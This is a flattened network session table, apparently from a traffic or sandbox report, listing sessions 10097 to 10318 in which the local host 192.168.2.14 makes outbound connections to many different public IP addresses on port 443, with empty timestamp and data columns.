                                      10097192.168.2.144728469.19.236.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10098192.168.2.143305018.199.142.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10099192.168.2.1433868207.179.160.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10100192.168.2.145403670.61.67.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10101192.168.2.1449284116.65.41.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10102192.168.2.145574648.215.82.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10103192.168.2.1460280147.60.12.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10104192.168.2.145387450.125.154.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10105192.168.2.144798484.104.223.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10106192.168.2.1434328183.151.23.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10107192.168.2.1454478165.179.73.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10108192.168.2.1455792186.245.34.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10109192.168.2.1448602188.244.242.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10110192.168.2.144693414.21.123.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10111192.168.2.1453188118.35.23.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10112192.168.2.1442312200.152.150.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10113192.168.2.145342864.197.64.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10114192.168.2.1445358130.173.149.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10115192.168.2.1460292186.2.85.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10116192.168.2.1456576113.72.47.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10117192.168.2.1454160130.132.243.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10118192.168.2.1436130138.184.40.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10119192.168.2.1457982188.146.218.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10120192.168.2.1454040128.177.9.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10121192.168.2.1450420123.56.195.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10122192.168.2.143793438.116.241.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10123192.168.2.1441464138.82.185.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10124192.168.2.1440178152.230.70.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10125192.168.2.1451308169.113.148.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10126192.168.2.144766257.219.55.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10127192.168.2.1457280174.81.173.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10128192.168.2.1436116203.74.73.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10129192.168.2.1456178178.116.15.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10130192.168.2.1455304218.134.95.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10131192.168.2.145923639.118.73.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10132192.168.2.1445488150.38.116.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10133192.168.2.1453308100.33.165.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10134192.168.2.1445744138.230.131.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10135192.168.2.1437310131.4.237.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10136192.168.2.14480449.214.230.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10137192.168.2.145672414.33.160.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10138192.168.2.1456198113.102.81.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10139192.168.2.145548238.32.93.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10140192.168.2.1458828110.210.158.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10141192.168.2.1458056206.123.26.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10142192.168.2.1460070202.98.204.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10143192.168.2.144667048.150.217.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10144192.168.2.1444922186.101.237.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10145192.168.2.1440334144.133.227.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10146192.168.2.1439692149.125.77.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10147192.168.2.144499847.207.133.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10148192.168.2.1439324186.127.93.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10149192.168.2.1435792163.102.111.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10150192.168.2.1450026104.65.146.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10151192.168.2.145523013.93.41.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10152192.168.2.144481857.205.80.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10153192.168.2.1450108115.244.208.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10154192.168.2.1458686160.43.225.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10155192.168.2.144189262.220.153.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10156192.168.2.1448204129.1.9.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10157192.168.2.14549984.76.162.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10158192.168.2.143817673.240.231.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10159192.168.2.1437682176.202.165.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10160192.168.2.143324075.222.220.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10161192.168.2.144891076.4.101.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10162192.168.2.1433416206.232.0.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10163192.168.2.1432912111.240.236.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10164192.168.2.143730080.29.144.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10165192.168.2.1452286108.254.64.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10166192.168.2.144782020.99.23.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10167192.168.2.1442774217.161.242.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10168192.168.2.145449242.167.118.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10169192.168.2.145500867.16.43.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10170192.168.2.146011423.57.79.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10171192.168.2.145279247.91.18.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10172192.168.2.1449184102.68.87.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10173192.168.2.145023049.7.105.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10174192.168.2.1450452148.0.155.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10175192.168.2.1442278179.60.12.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10176192.168.2.143495476.47.78.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10177192.168.2.1439148186.37.121.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10178192.168.2.1436756128.19.30.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10179192.168.2.14373545.109.36.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10180192.168.2.145340275.127.223.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10181192.168.2.145761652.106.56.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10182192.168.2.1445964197.157.4.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10183192.168.2.145256812.82.166.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10184192.168.2.1459634134.206.112.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10185192.168.2.1440058105.141.103.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10186192.168.2.143695639.73.17.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10187192.168.2.1460232156.109.231.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10188192.168.2.1440588190.115.123.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10189192.168.2.145382276.179.67.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10190192.168.2.145161871.155.251.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10191192.168.2.145713634.67.181.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10192192.168.2.143760058.44.242.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10193192.168.2.1446410202.235.81.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10194192.168.2.1436474128.122.93.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10195192.168.2.1433264221.99.64.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10196192.168.2.1460586171.215.134.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10197192.168.2.1459458114.225.159.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10198192.168.2.143551285.203.217.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10199192.168.2.1445164199.194.158.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10200192.168.2.143381250.238.71.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10201192.168.2.1444460152.106.198.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10202192.168.2.144751031.231.237.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10203192.168.2.1450868125.230.114.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10204192.168.2.143619040.221.236.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10205192.168.2.145624843.214.217.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10206192.168.2.1441818202.206.250.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10207192.168.2.145443690.223.245.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10208192.168.2.1450150109.62.136.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10209192.168.2.143347045.232.171.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10210192.168.2.1458818187.222.126.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10211192.168.2.1456486171.230.115.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10212192.168.2.1449522130.249.116.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10213192.168.2.1433242111.141.71.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10214192.168.2.1447990182.253.193.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10215192.168.2.1438242190.102.112.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10216192.168.2.1448422146.59.31.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10217192.168.2.1458528145.85.234.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10218192.168.2.143992074.189.6.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10219192.168.2.14373882.24.207.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10220192.168.2.145481423.168.25.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10221192.168.2.1435438122.114.115.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10222192.168.2.144381498.155.160.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10223192.168.2.145337484.204.16.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10224192.168.2.144352236.89.87.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10225192.168.2.145309098.120.143.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10226192.168.2.145152896.25.116.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10227192.168.2.143941044.119.100.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10228192.168.2.1434672164.203.176.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10229192.168.2.146006449.64.104.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10230192.168.2.144161867.190.255.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10231192.168.2.144207434.179.73.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10232192.168.2.1432968168.22.20.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10233192.168.2.1438236106.89.200.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10234192.168.2.1448738160.109.244.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10235192.168.2.1460370114.130.218.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10236192.168.2.1436824221.92.152.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10237192.168.2.1450804136.103.46.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10238192.168.2.144349464.213.144.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10239192.168.2.1453838153.59.184.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10240192.168.2.143296493.205.190.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10241192.168.2.1455864141.30.228.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10242192.168.2.144563423.199.241.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10243192.168.2.1435904120.98.122.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10244192.168.2.1454536169.70.48.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10245192.168.2.145232234.19.194.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10246192.168.2.1438198123.247.132.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10247192.168.2.145079888.94.145.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10248192.168.2.1433074178.217.204.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10249192.168.2.144999893.173.233.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10250192.168.2.145324664.136.28.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10251192.168.2.1445498131.221.239.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10252192.168.2.1440232221.35.4.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10253192.168.2.1451722144.243.103.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10254192.168.2.144127654.18.145.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10255192.168.2.143468662.222.162.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10256192.168.2.1435558144.3.186.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10257192.168.2.145536039.21.2.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10258192.168.2.144393423.133.181.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10259192.168.2.145151284.198.250.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10260192.168.2.1459566124.223.113.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10261192.168.2.145264290.101.146.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10262192.168.2.1436318222.153.176.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10263192.168.2.1451300134.183.180.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10264192.168.2.1452152172.235.193.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10265192.168.2.1438502187.181.228.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10266192.168.2.144007612.30.129.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10267192.168.2.145632299.1.3.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10268192.168.2.145091043.117.132.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10269192.168.2.1443280178.31.117.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10270192.168.2.144530286.202.246.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10271192.168.2.145511627.84.150.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10272192.168.2.1460642162.4.7.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10273192.168.2.1455546201.35.103.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10274192.168.2.1460098141.173.199.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10275192.168.2.1458800220.0.13.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10276192.168.2.145669451.102.209.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10277192.168.2.143840285.228.106.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10278192.168.2.1441084206.56.23.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10279192.168.2.1437236107.244.17.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10280192.168.2.144482284.194.154.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10281192.168.2.1451090130.222.138.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10282192.168.2.1441188208.48.50.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10283192.168.2.1437484159.84.163.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10284192.168.2.143599451.177.185.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10285192.168.2.1452320118.155.51.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10286192.168.2.1434510174.65.179.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10287192.168.2.1437344203.62.21.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10288192.168.2.1439084110.100.194.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10289192.168.2.143609897.212.159.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10290192.168.2.144195472.109.212.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10291192.168.2.1443866191.97.33.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10292192.168.2.144712057.127.187.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10293192.168.2.1437246103.238.158.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10294192.168.2.1453612201.87.224.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10295192.168.2.1454474203.28.183.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10296192.168.2.1451738204.254.55.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10297192.168.2.1445890122.78.24.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10298192.168.2.1439088174.242.59.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10299192.168.2.1437082206.198.76.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10300192.168.2.1439338101.197.35.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10301192.168.2.143805889.156.76.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10302192.168.2.1445182218.86.220.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10303192.168.2.1438956113.127.165.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10304192.168.2.1447106125.13.148.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10305192.168.2.1446634147.65.241.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10306192.168.2.1450760198.184.166.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10307192.168.2.1443726102.148.214.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10308192.168.2.1450108141.187.47.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10309192.168.2.1456114201.188.90.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10310192.168.2.145062897.218.242.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10311192.168.2.1435578130.159.54.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10312192.168.2.1445480138.208.21.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10313192.168.2.1448346131.189.251.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10314192.168.2.145447465.1.18.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10315192.168.2.144239653.54.42.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10316192.168.2.144633617.18.29.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10317192.168.2.1437252150.15.17.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      10318192.168.2.1458924211.188.27.68443
                                      TimestampBytes transferredDirectionData


